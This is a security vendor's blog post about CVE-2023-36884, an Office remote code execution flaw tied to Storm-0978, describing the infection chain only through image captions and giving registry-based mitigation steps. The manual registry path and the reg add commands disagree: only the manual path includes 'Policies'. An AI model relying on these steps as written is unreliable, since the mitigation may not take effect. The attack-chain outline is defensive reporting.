EXPLOITED: Microsoft Office
July 28, 2023
Blog
On July 11, Microsoft disclosed CVE-2023-36884 , an “Office and Windows HTML Remote Code Execution Vulnerability.” The exploitation allows external remote code execution if a harmful Microsoft Office document is opened. Reports from Cynet show the vulnerability has been utilized to hack NATO Summit attendees since June. It has been connected with the Russian-supported group Storm-0978, a threat known to exploit government offices in both North America and Europe.
Cynet’s customers were protected from CVE-2023-36884 by its Zero-Trust logic. It opens a door for known accepted activities, while any suspicious activity is impeded. Cynet explains, “The Zero-Trust logic is based on deep research of the OS operation and different trusted applications. By practicing ‘Know Good, Detect Evil,’ Cynet can detect the newest attacks in the wild.”
Security engineers at Cynet are adding and enhanced detection capabilities of its products to ensure safe mitigation of the vulnerability. Cynet is advising its clients to ensure their antivirus, memory protection mode, file operation protection, and ADT – behavioral heuristic are functioning as normal.
The Attack Process
(Caption: An example of the weaponized Word document. / Credit: Cynet)
(Caption: Embedded in the document is an RTF file with the malicious code. / Credit: Cynet)
(Caption: Contents of the “document.xml.rels” targets the rtf file, automatically loading it and executing the hidden code. / Credit: Cynet)
(Caption: Cynet 360 detected and prevented the malicious network connection, as presented in the alert information. / Credit: Cynet)
(Caption: Network artifacts can be extracted from the WinWord process memory. / Credit: Cynet)
(Caption: This file contains another artifact that is related to the SMB connection. / Credit: Cynet)
(Caption: Events recorded during the execution. / Credit: Cynet)
(Caption: The interesting event presents CreateFile (read action) for an SMB share controlled by the threat actors. / Credit: Cynet)
(Caption: Second stage payload, “file001.url,” file contains HTML content appended to the document, with Follina-style msdt handler execution inside an iframe. / Credit: Cynet)
Get Safe
Cynet recommends anyone who may be affected should set their FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry.
Go to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION in your registry editor.
Create the following keys as a type of REG_DWORD and set their values to 1:
- Excel.exe
- Graph.exe
- MSAccess.exe
- MSPub.exe
- PowerPoint.exe
- Visio.exe
- WinProj.exe
- WinWord.exe
- Wordpad.exe
Or, the subsequent commands can be ran as administrator:
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “Excel.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “Graph.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “MSAccess.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “MSPub.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “PowerPoint.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “Visio.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “WinProj.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “WinWord.exe” /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION” /v “Wordpad.exe” /t REG_DWORD /d 1 /f
The OS does not require a restart, but a restart of the application is essential.*
*Editor's note: This step may impact the regular functionality of the applications.
**This vulnerability has been modified and is currently undergoing reanalysis, continue to chec knvd.nist.gov/vuln/detail/CVE-2023-36884 for an updated summary.